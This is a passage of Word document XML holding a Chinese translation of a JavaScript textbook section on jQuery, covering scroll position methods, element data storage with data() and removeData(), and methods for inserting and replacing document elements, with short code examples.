        <w:t>).width(x).width()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>值。然而，对于使用</w:t>
      </w:r>
      <w:r>
        <w:t>border-box</w:t>
      </w:r>
      <w:r>
        <w:t>模型的元素，这种情况下一般不会返回</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与位置尺寸相关的最后一对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft()</w:t>
      </w:r>
      <w:r>
        <w:t>，可获取或设置元素的滚动条位置。这些方法可用在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象以及</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>元素上，当用在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上时，会获取或设置存放该</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的滚动条位置。与其他</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>不同，不可传递函数给</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTop()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>scrollLeft()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可使用</w:t>
      </w:r>
      <w:r>
        <w:t>scrollTo</w:t>
      </w:r>
      <w:r>
        <w:t>p()</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>，与</w:t>
      </w:r>
      <w:r>
        <w:t>height()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一起，来定义一个方法：根据指定的页面数向上或向下滚动窗口：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>根据页面数</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>来滚动窗口。</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>可以是分数或负数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function page(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var w=$(window);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>封装为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pagesize=w.height();//</w:t>
      </w:r>
      <w:r>
        <w:t>得到页面大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var current=w.scrollTop();//</w:t>
      </w:r>
      <w:r>
        <w:t>得到当前滚动条位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w.scrollTop(current+n*pagesize);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置新的滚动条位置</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72" w:name="19_2_7_Huo_Qu_He_She_Zhi_Yuan_Su_Shu_Ju_"/>
      <w:r>
        <w:t>19.2.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　获取和设置元素数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>getter/setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可用来设置或获取与文档元素、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象相关联的数据。可以将数据与任意元素关联是很重要和强大的一项能力：这是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序注册和效果队列机制的基础，有时，我们还会在自己的代码中使用</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需将数据与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的元素关联，传递名称和值两个参数给</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>方法即可。还可以传递一个对象给</w:t>
      </w:r>
      <w:r>
        <w:t>data()setter</w:t>
      </w:r>
      <w:r>
        <w:t>，此时，该对象的每一个属性都将用做名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>对，用来与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的元素关联。注意，传递对象给</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>时，该对象的属性将替换掉与元素相关联的旧数据。与很多其他</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>不接受函数参数。当将函数作为第二参数传递给</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>时，该函数会存储，就和其他值一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当然，</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也可以用做</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>。当不带参数调用时，它会返回一个对象，含有与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的第一个元素相关联的所有名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。当传入一个字符串参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它会返回对于第一个元素与该字符串参数相关联的数据值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>removeData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来</w:t>
      </w:r>
      <w:r>
        <w:t>从元素中删除数据。（使用</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>设置值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和实际上删除该值不是同一回事。）如果传递字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>removeData()</w:t>
      </w:r>
      <w:r>
        <w:t>，该方法会删除元素中与该字符串相关联的值。如果不带参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>removeData()</w:t>
      </w:r>
      <w:r>
        <w:t>，它会删除与元素相关联的所有数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div").data("x",1);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置一些数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("div.nodata").removeData("x");//</w:t>
      </w:r>
      <w:r>
        <w:t>删除一些数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=$('#mydiv').data("x");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取一些数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>data(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的工具函数形式。要给单一元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>关联数据，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法形式，也可以使用其函数形式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(e).data(...)//</w:t>
      </w:r>
      <w:r>
        <w:t>方法形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$.data(e,...)//</w:t>
      </w:r>
      <w:r>
        <w:t>函数形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的数据框架没有将元素数据当做元素的属性来存储，但它的确需要给元素添加一个特殊属性用来与数据关联。由于某些浏览器不允许添加属性到＜</w:t>
      </w:r>
      <w:r>
        <w:t>applet</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>embed</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中，因此</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>根本不允许给这些类型的元素关联数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="19_3_Xiu_Gai_Wen_Dang_Jie_Gou_"/>
      <w:r>
        <w:t>19.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　修改文档结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>19.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节中我们知道</w:t>
      </w:r>
      <w:r>
        <w:t>html()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可用来设置元素内容。本节将讲述能对文档做出更复杂修改的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档表示为一棵节点树，而不是一个字符的线性序列，因此插入、删除、替换操作不会像操作字符串和数组一样简单。接下来的内容会阐释用于文档修改的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的各种方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="19_3_1_Cha_Ru_He_Ti_Huan_Yuan_Su_"/>
      <w:r>
        <w:t>19.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　插入和替换元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>让我们从基本的插入和替换方法开始。下面演示的每一个方法都接受一个参数，用于指定需要插入文档中的内容。该参数可以是用于指定新内容的纯文本或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，也可以是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象、元素或文本节点。根</w:t>
      </w:r>
      <w:r>
        <w:t>据调用的方法不同，会在选中元素的里面、前面或后面位置中插入内容。如果待插入的内容是已存在于文档中的元素，会从当前位置移走它。如果它需要插入多次，在必要时会复制</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该元素。这些方法都返回调用自身的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。注意，在</w:t>
      </w:r>
      <w:r>
        <w:t>replaceWith()</w:t>
      </w:r>
      <w:r>
        <w:t>运行后，该</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的元素将不再存在于文档中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#log").append("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+message);//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>#log</w:t>
      </w:r>
      <w:r>
        <w:t>元素的结尾处添加内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").prepend("§");//</w:t>
      </w:r>
      <w:r>
        <w:t>在每个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的起始处添加章节标识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").befor</w:t>
      </w:r>
      <w:r>
        <w:t>e("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>hr/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>在每个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的前面添加水平线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").after("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>hr/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>在每个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的后面添加水平线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("hr").replaceWith("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>替换＜</w:t>
      </w:r>
      <w:r>
        <w:t>hr/</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素为＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h2").each(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将＜</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞替换为＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>保持内容不变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var h2=$(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>h2.replaceWith("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+h2.html()+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//after()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>before()</w:t>
      </w:r>
      <w:r>
        <w:t>也可用在文本节点上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>给每个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的开头添加章节标识的另一种方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").map(function(){return this.firstChild;}).before("§");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个用于结构修改的方法都接受函数参数，用来计算出需要插入的值。和平常一样，如果传入函数，该函数会为每个选中元素调用一次。</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值将指向该元素，在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中元素的索引值将作为第一参数。对于</w:t>
      </w:r>
      <w:r>
        <w:t>append()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>prepend()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>replaceWith()</w:t>
      </w:r>
      <w:r>
        <w:t>，第二参数将是该元素当前内容的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串形式。对于</w:t>
      </w:r>
      <w:r>
        <w:t>before()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>after()</w:t>
      </w:r>
      <w:r>
        <w:t>，该函数在调用时没有第二参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面演示的</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个方法都在目标元素上调用，并传入需要插入的内容作为参数。这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个方法中的每一个都可以找到另一个方法来实现差不多一样的功能，</w:t>
      </w:r>
      <w:r>
        <w:t>只要采用不同的方式操作即可：在内容上调用，并传入目标元素作为参数。下表展示了这些方法对：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4106173" cy="1255143"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="44" name="00044.jpeg" descr="0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00044.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4106173" cy="1255143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在上面的例子代码中演示的方法在上表第二列中。第三列中的方法会在下面演示。要理解这些方法对，有几个重要事项：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果传递字符串给第二列中的方法，会把它当做需要插入的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。如果传递字符串给第三列中的方法，会把它当做选择器，用来标识目标元素。（也可以直接传入</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象、元素或文本节点来指明目标元素。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第三列中的方法不接受函数参数，第二栏中的方法可以。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
